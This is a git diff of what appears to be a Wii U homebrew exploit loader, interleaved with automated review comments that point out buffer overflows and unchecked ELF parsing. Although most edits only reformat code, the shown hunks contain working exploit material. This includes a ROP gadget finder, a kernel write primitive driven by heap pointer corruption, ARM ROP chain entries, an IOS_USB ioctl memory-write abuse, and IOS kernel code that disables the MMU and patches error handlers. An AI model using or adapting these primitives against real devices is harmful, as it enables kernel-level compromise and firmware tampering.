diff --git a/source/ElfUtils.c b/source/ElfUtils.c index 2d6b830..359aae2 100644 --- a/source/ElfUtils.c +++ b/source/ElfUtils.c @@ -2,22 +2,21 @@ #include #include -#include #include #include #include #include #include +#include #include "elf_abi.h" - int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { char path[256]; int result = 0; char *sdRootPath = ""; if (!WHBMountSdCard()) { - WHBLogPrintf("Failed to mount SD Card..."); + DEBUG_FUNCTION_LINE("Failed to mount SD Card..."); result = -1; goto exit; } @@ -25,12 +24,12 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si sdRootPath = WHBGetSdCardMountPath(); sprintf(path, "%s/%s", sdRootPath, relativefilepath); - WHBLogPrintf("Loading file %s.", path); + DEBUG_FUNCTION_LINE("Loading file %s.", path); *fileOut = WHBReadWholeFile(path, sizeOut); if (!(*fileOut)) { result = -2; - WHBLogPrintf("WHBReadWholeFile(%s) returned NULL", path); + DEBUG_FUNCTION_LINE("WHBReadWholeFile(%s) returned NULL", path); goto exit; } @@ -74,16 +73,19 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned for (i = 0; i < ehdr->e_shnum; i++) { const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name; if (strcmp(section_name, name) == 0) { - if (addr) + if (addr) { *addr = shdr[i].sh_addr; - if (size) + } + if (size) { *size = shdr[i].sh_size; + } return shdr[i].sh_offset; } } - if (fail_on_not_found) + if (fail_on_not_found) { OSFatal((char *) name); + } return 0; } diff --git a/source/ElfUtils.h b/source/ElfUtils.h index e55663d..67ad225 100644 --- a/source/ElfUtils.h +++ b/source/ElfUtils.h @@ -1,5 +1,4 @@ -#ifndef ELF_LOADING_H -#define ELF_LOADING_H +#pragma once #include @@ -13,6 +12,3 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ #ifdef __cplusplus } #endif - -#endif /* ELF_LOADING_H */ - 
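Review bot: `sprintf(path, "%s/%s", sdRootPath, relativefilepath);` in the second hunk writes into the 256-byte stack buffer `path` with no bound, so a long `relativefilepath` (or a long mount path) overflows the stack; this hunk only swaps the logging calls around it. Use `snprintf` and treat truncation as a failure: `int n = snprintf(path, sizeof path, "%s/%s", sdRootPath, relativefilepath);` followed by `if (n < 0 || (size_t) n >= sizeof path) { result = -3; goto exit; }` (the `-3` is a new code, since `-1`/`-2` are already used; document it with the others in the header). LoadFileToMem continues past the end of the hunk.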
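Review bot: get_section, in the third hunk, trusts every header field of an ELF image that LoadFileToMem reads from the SD card: `shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name` is dereferenced as the section name with no check that `e_shstrndx < e_shnum` or that the resulting offset lies inside the file, so a malformed image reads out of bounds before `strcmp` runs, and the returned `sh_offset` is passed on unchecked too. The brace-only change here leaves that as it was. The function signature and the `ehdr`/`shdr` setup are above the hunk, so I cannot see whether a buffer size is available; if it is not, add a size parameter and validate `e_shstrndx`, `sh_offset` and `sh_name` against it before dereferencing, treating a failure like the not-found path.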
diff --git a/source/gx2sploit.cpp b/source/gx2sploit.cpp index 1333ea8..f902c83 100644 --- a/source/gx2sploit.cpp +++ b/source/gx2sploit.cpp @@ -14,46 +14,20 @@ #include #include "ElfUtils.h" #include "gx2sploit.h" -#include "utils/utils.h" + +#define JIT_ADDRESS 0x01800000 + +#define KERN_HEAP 0xFF200000 +#define KERN_HEAP_PHYS 0x1B800000 -#define JIT_ADDRESS 0x01800000 +#define KERN_CODE_READ 0xFFF023D4 +#define KERN_CODE_WRITE 0xFFF023F4 +#define KERN_DRVPTR 0xFFEAB530 -#define KERN_HEAP 0xFF200000 -#define KERN_HEAP_PHYS 0x1B800000 - - -#define KERN_CODE_READ 0xFFF023D4 -#define KERN_CODE_WRITE 0xFFF023F4 -#define KERN_DRVPTR 0xFFEAB530 -#define KERN_ADDRESS_TBL 0xFFEAB7A0 - -#define STARTID_OFFSET 0x08 -#define METADATA_OFFSET 0x14 -#define METADATA_SIZE 0x10 - -#define BAT_SETUP_HOOK_ADDR 0xFFF1D624 -#define BAT_SETUP_HOOK_ENTRY 0x00880000 -#define BAT4U_VAL 0x008000FF -#define BAT4L_VAL 0x30800012 - -#define BAT_SET_NOP_ADDR_1 0xFFF06B6C -#define BAT_SET_NOP_ADDR_2 0xFFF06BF8 -#define BAT_SET_NOP_ADDR_3 0xFFF003C8 -#define BAT_SET_NOP_ADDR_4 0xFFF003CC -#define BAT_SET_NOP_ADDR_5 0xFFF1D70C -#define BAT_SET_NOP_ADDR_6 0xFFF1D728 -#define BAT_SET_NOP_ADDR_7 0xFFF1D82C - -#define BAT_SET_NOP_ADDR_8 0xFFEE11C4 -#define BAT_SET_NOP_ADDR_9 0xFFEE11C8 - -#define ADDRESS_main_entry_hook 0x0101c56c -#define ADDRESS_OSTitle_main_entry_ptr 0x1005E040 - -#define NOP_ADDR(addr) \ - *(uint32_t*)addr = 0x60000000; \ - asm volatile("dcbf 0, %0; icbi 0, %0" : : "r" (addr & ~31)); +#define STARTID_OFFSET 0x08 +#define METADATA_OFFSET 0x14 +#define METADATA_SIZE 0x10 extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); 
@@ -63,8 +37,9 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star /* Search code before JIT area first */ for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) { - if (!memcmp(ptr, &code[0], length)) + if (!memcmp(ptr, &code[0], length)) { return ptr; + } } OSFatal("Failed to find gadget!"); @@ -131,7 +106,7 @@ int exploitThread(int argc, char **argv) { uint32_t gx2data[] = {0xfc2a0000}; uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; - void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14; + void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); /* Modify a next ptr on the heap */ uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; @@ -185,8 +160,8 @@ extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len); void KernelWrite(uint32_t addr, const void *data, uint32_t length) { // This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?) // further testing required. - for (int32_t i = 0; i < length; i += 4) { - KernelWriteU32(addr + i, *(uint32_t *) (data + i)); + for (uint32_t i = 0; i < length; i += 4) { + KernelWriteU32(addr + i, *(uint32_t *) (((uint32_t) data) + i)); } } 
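Review bot: The scan in find_gadget has no real upper bound: the loop only stops when `ptr` becomes exactly `(uint32_t *) JIT_ADDRESS`, yet exploitThread in the next hunk calls it with `gadgets_start = 0x10000000`, which is above `JIT_ADDRESS` (0x01800000), so for that caller the loop walks upward until it matches or faults; `memcmp(ptr, &code[0], length)` also reads up to `length` bytes past whatever end is intended. Give the function an explicit end (a new `gadgets_end` parameter) and compare with `length` accounted for, e.g. `for (ptr = (uint32_t *) gadgets_start; (uint32_t) ptr + length <= gadgets_end; ptr++)`, and document that `length` is in bytes (the callers pass `0x04` and `0x2C`). The signature is cut off by the hunk header, so the parameter list is inferred from the calls.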
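Review bot: KernelWrite still assumes `length` is a multiple of 4: with the new `uint32_t i` loop, a `length` of 6 makes the last iteration read 4 bytes from `data + 4` and write all 4 of them, i.e. it reads 2 bytes past `data` and clobbers 2 bytes beyond `addr + length`. The `*(uint32_t *) (((uint32_t) data) + i)` read is also unaligned whenever `data` is not 4-byte aligned, which the comment above the loop hints at. Reject or handle the tail explicitly — e.g. `if (length & 3) { OSFatal("KernelWrite: length must be a multiple of 4"); }` before the loop (constructed message) — and read each word with `uint32_t word; memcpy(&word, (const char *) data + i, sizeof word);` so alignment does not matter.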
@@ -203,17 +178,6 @@ void KernelWriteU32(uint32_t addr, uint32_t value) { ICInvalidateRange((void *) addr, 4); } - -void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value) { - ICInvalidateRange(&value, 4); - DCFlushRange(&value, 4); - - uint32_t dst = (uint32_t) addr; - uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value); - - SC_KernelCopyData(dst, src, 4); -} - static void SCSetupIBAT4DBAT5() { asm volatile("sync; eieio; isync"); @@ -236,7 +200,6 @@ static void SCSetupIBAT4DBAT5() { extern "C" void SC_0x36_SETBATS(void); - int DoKernelExploit(void) { WHBLogPrintf("Running GX2Sploit"); /* Make a thread to modify the semaphore */ diff --git a/source/gx2sploit.h b/source/gx2sploit.h index 39e27d1..a294363 100644 --- a/source/gx2sploit.h +++ b/source/gx2sploit.h @@ -1,6 +1,5 @@ #pragma once - #ifdef __cplusplus extern "C" { #endif @@ -13,7 +12,6 @@ extern "C" { int DoKernelExploit(void); -void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value); void KernelWrite(uint32_t addr, const void *data, uint32_t length); void kern_write(const void *addr, uint32_t value); @@ -21,9 +19,6 @@ extern int32_t Register(char *driver_name, uint32_t name_length, void *buf1, voi extern void CopyToSaveArea(char *driver_name, uint32_t name_length, void *buffer, uint32_t length); extern void set_semaphore_phys(uint32_t set_semaphore, uint32_t kpaddr, uint32_t gx2data_addr); -extern void SC0x25_SetupSyscall(void); -extern unsigned int SC0x65_ExploitCheck(unsigned int in); - #ifdef __cplusplus } #endif diff --git a/source/ios_exploit.c b/source/ios_exploit.c index d8daadb..e98ef60 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c 
@@ -5,19 +5,12 @@ #include #include "ios_exploit.h" -#define ALIGN4(x) (((x) + 3) & ~3) - #define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 #define SOURCE (0x120000) #define IOS_CREATETHREAD 0x1012EABC #define ARM_CODE_BASE 0x08135000 #define REPLACE_SYSCALL 0x081298BC -extern const uint8_t launch_image_tga[]; -extern const uint32_t launch_image_tga_size; - static void uhs_exploit_init(int uhs_handle); static int uhs_write32(int uhs_handle, int arm_addr, int val); @@ -237,7 +230,7 @@ static const int final_chain[] = { 0x0, // 0x1F0 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} 0x0, // 0x1F8 - sizeof(ios_kernel), // 0x1FC our code size + sizeof(ios_kernel),// 0x1FC our code size 0x0, // 0x200 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} 0x00140000, // 0x208 our code source location @@ -326,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { } static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) - OSSleepTicks(0x200000); //! Improves stability - int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 + ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) + OSSleepTicks(0x200000); //! Improves stability + int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); } 
@@ -337,13 +330,7 @@ static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { int ExecuteIOSExploit() { int iosuhaxFd = IOS_Open("/dev/iosuhax", 0); if (iosuhaxFd >= 0) { - int dummy = 0; - - //IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy)); - //! do not run patches again as that will most likely crash - //! because the wupserver and the iosuhax dev node are still running - //! just relaunch IOS with new configuration IOS_Close(iosuhaxFd); return 0; } diff --git a/source/ios_exploit.h b/source/ios_exploit.h index c7dceec..ec0b2ed 100644 --- a/source/ios_exploit.h +++ b/source/ios_exploit.h @@ -1,5 +1,4 @@ -#ifndef _IOS_EXPLOIT_H_ -#define _IOS_EXPLOIT_H_ +#pragma once #ifdef __cplusplus extern "C" { @@ -10,5 +9,3 @@ int ExecuteIOSExploit(); #ifdef __cplusplus } #endif - -#endif diff --git a/source/ios_kernel/source/instant_patches.c b/source/ios_kernel/source/instant_patches.c index 7a76f63..363ce36 100644 --- a/source/ios_kernel/source/instant_patches.c +++ b/source/ios_kernel/source/instant_patches.c @@ -29,14 +29,13 @@ #define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) void instant_patches_setup(void) { - // fix 10 minute timeout that crashes MCP after 10 minutes of booting - *(volatile u32*)(0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT - + *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT + // patch default title id to system menu - *(volatile u32*)mcp_data_phys(0x050B817C) = *(volatile u32*)0x0017FFF0; - *(volatile u32*)mcp_data_phys(0x050B8180) = *(volatile u32*)0x0017FFF4; + *(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0; + *(volatile u32 *) mcp_data_phys(0x050B8180) = *(volatile u32 *) 0x0017FFF4; // force check USB storage on load - *(volatile u32*)acp_phys(0xE012202C) = 0x00000001; // find USB flag + *(volatile u32 *) acp_phys(0xE012202C) = 0x00000001; // find USB flag } 
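Review bot: Both changed functions on this line lose the only explanation of a non-obvious statement. In ExecuteIOSExploit the early `return 0` when `/dev/iosuhax` opens successfully is now bare; the removed lines explained that the patches must not run again because iosuhax and wupserver are still live, so keep that as `// iosuhax already running: running the patches again would crash, treat the exploit as done`. In instant_patches_setup the `= 0xFFFFFFFF; // NEW_TIMEOUT` store lost the line saying it fixes the 10-minute timeout that crashes MCP after boot; restore that comment above the store. `IOS_Close(iosuhaxFd)` also drops its return value, which is probably acceptable on this path but worth saying in the same comment.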
diff --git a/source/ios_kernel/source/main.c b/source/ios_kernel/source/main.c
index f843fd8..b929231 100644
--- a/source/ios_kernel/source/main.c
+++ b/source/ios_kernel/source/main.c
@@ -27,78 +27,76 @@ #define USB_PHYS_CODE_BASE 0x101312D0 -typedef struct -{ +typedef struct { u32 size; u8 data[0]; } payload_info_t; static const char repairData_set_fault_behavior[] = { - 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, - 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, - 0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D, + 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00, + 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02, + 0xE1, 0x53, 0x00, 0x00, 0xE3, 0xE0, 0x00, 0x00, 0x18, 0xBD, 0x80, 0x30, 0xE3, 0x54, 0x00, 0x0D, }; static const char repairData_set_panic_behavior[] = { - 0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70, - 0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00, - 0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4, - 0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94, - 0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E, - 0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00, - 0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00, + 0x08, 0x16, 0x6C, 0x00, 0x00, 0x00, 0x18, 0x0C, 0x08, 0x14, 0x40, 0x00, 0x00, 0x00, 0x9D, 0x70, + 0x08, 0x16, 0x84, 0x0C, 0x00, 0x00, 0xB4, 0x0C, 0x00, 0x00, 0x01, 0x01, 0x08, 0x14, 0x40, 0x00, + 0x08, 0x15, 0x00, 0x00, 0x08, 0x17, 0x21, 0x80, 0x08, 0x17, 0x38, 0x00, 0x08, 0x14, 0x30, 0xD4, + 0x08, 0x14, 0x12, 0x50, 0x08, 0x14, 0x12, 0x94, 0xE3, 0xA0, 0x35, 0x36, 0xE5, 0x93, 0x21, 0x94, + 0xE3, 0xC2, 0x2E, 0x21, 0xE5, 0x83, 0x21, 0x94, 0xE5, 0x93, 0x11, 0x94, 0xE1, 0x2F, 0xFF, 0x1E, + 0xE5, 0x9F, 0x30, 0x1C, 0xE5, 0x9F, 0xC0, 0x1C, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x10, 0x00, + 0xE5, 0x92, 0x30, 0x54, 0xE5, 0x9C, 0x00, 0x00, }; static const char 
repairData_usb_root_thread[] = { - 0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10, - 0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3, - 0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90, - 0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8, - 0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0, - 0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03, - 0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20, + 0xE5, 0x8D, 0xE0, 0x04, 0xE5, 0x8D, 0xC0, 0x08, 0xE5, 0x8D, 0x40, 0x0C, 0xE5, 0x8D, 0x60, 0x10, + 0xEB, 0x00, 0xB2, 0xFD, 0xEA, 0xFF, 0xFF, 0xC9, 0x10, 0x14, 0x03, 0xF8, 0x10, 0x62, 0x4D, 0xD3, + 0x10, 0x14, 0x50, 0x00, 0x10, 0x14, 0x50, 0x20, 0x10, 0x14, 0x00, 0x00, 0x10, 0x14, 0x00, 0x90, + 0x10, 0x14, 0x00, 0x70, 0x10, 0x14, 0x00, 0x98, 0x10, 0x14, 0x00, 0x84, 0x10, 0x14, 0x03, 0xE8, + 0x10, 0x14, 0x00, 0x3C, 0x00, 0x00, 0x01, 0x73, 0x00, 0x00, 0x01, 0x76, 0xE9, 0x2D, 0x4F, 0xF0, + 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03, + 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20, }; -int _main() -{ - void(*invalidate_icache)() = (void(*)())0x0812DCF0; - void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164; - void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160; +int _main() { + void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; + void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164; + void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; - flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache + flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache - int level = disable_interrupts(); + int level = disable_interrupts(); - unsigned int control_register = disable_mmu(); + unsigned int control_register = 
disable_mmu(); - /* Save the request handle so we can reply later */ - *(volatile u32*)0x0012F000 = *(volatile u32*)0x1016AD18; + /* Save the request handle so we can reply later */ + *(volatile u32 *) 0x0012F000 = *(volatile u32 *) 0x1016AD18; - /* Patch kernel_error_handler to BX LR immediately */ - *(volatile u32*)0x08129A24 = 0xE12FFF1E; + /* Patch kernel_error_handler to BX LR immediately */ + *(volatile u32 *) 0x08129A24 = 0xE12FFF1E; - void * pset_fault_behavior = (void*)0x081298BC; - kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); + void *pset_fault_behavior = (void *) 0x081298BC; + kernel_memcpy(pset_fault_behavior, (void *) repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); - void * pset_panic_behavior = (void*)0x081296E4; - kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); + void *pset_panic_behavior = (void *) 0x081296E4; + kernel_memcpy(pset_panic_behavior, (void *) repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); - void * pusb_root_thread = (void*)0x10100174; - kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); + void *pusb_root_thread = (void *) 0x10100174; + kernel_memcpy(pusb_root_thread, (void *) repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); - payload_info_t *payloads = (payload_info_t*)0x00148000; - kernel_memcpy((void*)USB_PHYS_CODE_BASE, payloads->data, payloads->size); + payload_info_t *payloads = (payload_info_t *) 0x00148000; + kernel_memcpy((void *) USB_PHYS_CODE_BASE, payloads->data, payloads->size); // run all instant patches as necessary instant_patches_setup(); - *(volatile u32*)(0x1555500) = 0; + *(volatile u32 *) (0x1555500) = 0; - /* REENABLE MMU */ - restore_mmu(control_register); + /* REENABLE MMU */ + restore_mmu(control_register); - invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 
0x4000 invalidates all cache - invalidate_icache(); + invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache + invalidate_icache(); - enable_interrupts(level); + enable_interrupts(level); - return 0; + return 0; } diff --git a/source/ios_kernel/source/utils.c b/source/ios_kernel/source/utils.c index 8ce65ae..03cd42f 100644 --- a/source/ios_kernel/source/utils.c +++ b/source/ios_kernel/source/utils.c @@ -23,38 +23,33 @@ ***************************************************************************/ // this memcpy is optimized for speed and to work with MEM1 32 bit access alignment requirement -void reverse_memcpy(void* dst, const void* src, unsigned int size) -{ +void reverse_memcpy(void *dst, const void *src, unsigned int size) { const unsigned char *src_p; unsigned char *dst_p; - if((size >= 4) && !((dst - src) & 3)) - { + if ((size >= 4) && !((dst - src) & 3)) { const unsigned int *src_p32; unsigned int *dst_p32; - unsigned int endDst = ((unsigned int)dst) + size; + unsigned int endDst = ((unsigned int) dst) + size; unsigned int endRest = endDst & 3; - if(endRest) - { - src_p = ((const unsigned char*)(src + size)) - 1; - dst_p = ((unsigned char*)endDst) - 1; + if (endRest) { + src_p = ((const unsigned char *) (src + size)) - 1; + dst_p = ((unsigned char *) endDst) - 1; size -= endRest; - while(endRest--) + while (endRest--) *dst_p-- = *src_p--; } - src_p32 = ((const unsigned int*)(src + size)) - 1; - dst_p32 = ((unsigned int*)(dst + size)) - 1; + src_p32 = ((const unsigned int *) (src + size)) - 1; + dst_p32 = ((unsigned int *) (dst + size)) - 1; unsigned int size32 = size >> 5; - if(size32) - { + if (size32) { size &= 0x1F; - while(size32--) - { + while (size32--) { src_p32 -= 8; dst_p32 -= 8; 
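Review bot: The three `repairData_*` tables are declared `static const char[]` but initialised with values such as `0xE1` and `0xBD` that do not fit a signed `char`; whether `char` is signed is implementation-defined, so the stored values are too (it works today only because ARM GCC's `char` is unsigned) and `-Wconversion` flags every element. The file already uses `u8` for payload bytes (`u8 data[0]` in payload_info_t), so declare them `static const u8 repairData_set_fault_behavior[] = {` and likewise for the other two; the kernel_memcpy calls already cast the tables to `void *`, so nothing else changes. While touching payload_info_t, `u8 data[0];` is the GNU zero-length array — the C99 flexible array member `u8 data[];` is the standard spelling. `payloads->size` is read from a fixed address and passed straight to kernel_memcpy with no upper bound; if whoever writes that block is trusted that is fine, but a comment stating that assumption would help the next reader.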
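Review bot: `(dst - src) & 3`, `src + size` and `dst + size` in reverse_memcpy do arithmetic on `void *`, which compiles only as a GNU extension, and subtracting two pointers that point into different objects is undefined behaviour regardless of the extension; the hunk reindents those lines but leaves them as they were. Since the function already converts `dst` to `unsigned int` for `endDst`, do the same for the alignment test — `if ((size >= 4) && !(((unsigned int) dst - (unsigned int) src) & 3))` — and form the end pointers from `unsigned char *` / `const unsigned char *` bases instead of `void *`. reverse_memcpy continues into the next hunk, where the trailing byte loop lives.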
@@ -70,23 +65,20 @@ void reverse_memcpy(void* dst, const void* src, unsigned int size) } unsigned int size4 = size >> 2; - if(size4) - { + if (size4) { size &= 3; - while(size4--) + while (size4--) *dst_p32-- = *src_p32--; } - dst_p = ((unsigned char*)dst_p32) + 3; - src_p = ((const unsigned char*)src_p32) + 3; - } - else - { - dst_p = ((unsigned char*)dst) + size - 1; - src_p = ((const unsigned char*)src) + size - 1; + dst_p = ((unsigned char *) dst_p32) + 3; + src_p = ((const unsigned char *) src_p32) + 3; + } else { + dst_p = ((unsigned char *) dst) + size - 1; + src_p = ((const unsigned char *) src) + size - 1; } - while(size--) + while (size--) *dst_p-- = *src_p--; } diff --git a/source/ios_usb/source/main.c b/source/ios_usb/source/main.c index f9f5321..f82962f 100644 --- a/source/ios_usb/source/main.c +++ b/source/ios_usb/source/main.c @@ -1,24 +1,24 @@ -void _main() -{ +void _main() { - void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C; + void (*ios_shutdown)(int) = (void (*)(int)) 0x1012EE4C; - int(*reply)(int, int) = (int(*)(int, int))0x1012ED04; + int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04; - int saved_handle = *(volatile int*)0x0012F000; - int myret = reply(saved_handle, 0); - if (myret != 0) - ios_shutdown(1); + int saved_handle = *(volatile int *) 0x0012F000; + int myret = reply(saved_handle, 0); + if (myret != 0) { + ios_shutdown(1); + } - // stack pointer will be 0x1016AE30 - // link register will be 0x1012EACC - asm("LDR SP, newsp\n" - "LDR R0, newr0\n" - "LDR LR, newlr\n" - "LDR PC, newpc\n" - "newsp: .word 0x1016AE30\n" - "newlr: .word 0x1012EACC\n" - "newr0: .word 0x10146080\n" - "newpc: .word 0x10111164\n"); + // stack pointer will be 0x1016AE30 + // link register will be 0x1012EACC + asm("LDR SP, newsp\n" + "LDR R0, newr0\n" + "LDR LR, newlr\n" + "LDR PC, newpc\n" + "newsp: .word 0x1016AE30\n" + "newlr: .word 0x1012EACC\n" + "newr0: .word 0x10146080\n" + "newpc: .word 0x10111164\n"); } 
diff --git a/source/main.cpp b/source/main.cpp index 664c892..dfd78a2 100644 --- a/source/main.cpp +++ b/source/main.cpp @@ -1,41 +1,24 @@ #include #include -#include - -#include #include -#include #include -#include - #include #include -#include #include #include #include -#include +#include #include -#include #include #include "utils/logger.h" -#include "utils/utils.h" #include "ElfUtils.h" #include "ios_exploit.h" #include "gx2sploit.h" -#ifdef __cplusplus -extern "C" { -#endif - -#ifdef __cplusplus -} -#endif - bool CheckRunning() { switch (ProcUIProcessMessages(true)) { @@ -56,8 +39,6 @@ bool CheckRunning() { return true; } -extern "C" uint64_t _SYSGetSystemApplicationTitleId(int); - int main(int argc, char **argv) { WHBLogUdpInit(); @@ -105,13 +86,13 @@ int main(int argc, char **argv) { DEBUG_FUNCTION_LINE("ProcUIInit done"); if (loadWithoutHacks) { - DEBUG_FUNCTION_LINE("Load system menu"); - // Restore the default title id to the normal wii u menu. - unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0); + DEBUG_FUNCTION_LINE("Load Wii U Menu"); + // Restore the default title id to the normal Wii U Menu. + unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU); memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8); DCStoreRange((void *) 0xF417FFF0, 0x8); - DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll); + DEBUG_FUNCTION_LINE("Forcing start of title: %016llX\n", sysmenuIdUll); ExecuteIOSExploit(); SYSLaunchMenu(); @@ -123,7 +104,7 @@ int main(int argc, char **argv) { } ProcUIShutdown(); - DEBUG_FUNCTION_LINE("Bye!"); + DEBUG_FUNCTION_LINE("Exiting."); WHBLogUdpDeinit(); return 0; diff --git a/source/utils/StringTools.cpp b/source/utils/StringTools.cpp deleted file mode 100644 index d5c366f..0000000 --- a/source/utils/StringTools.cpp +++ /dev/null 
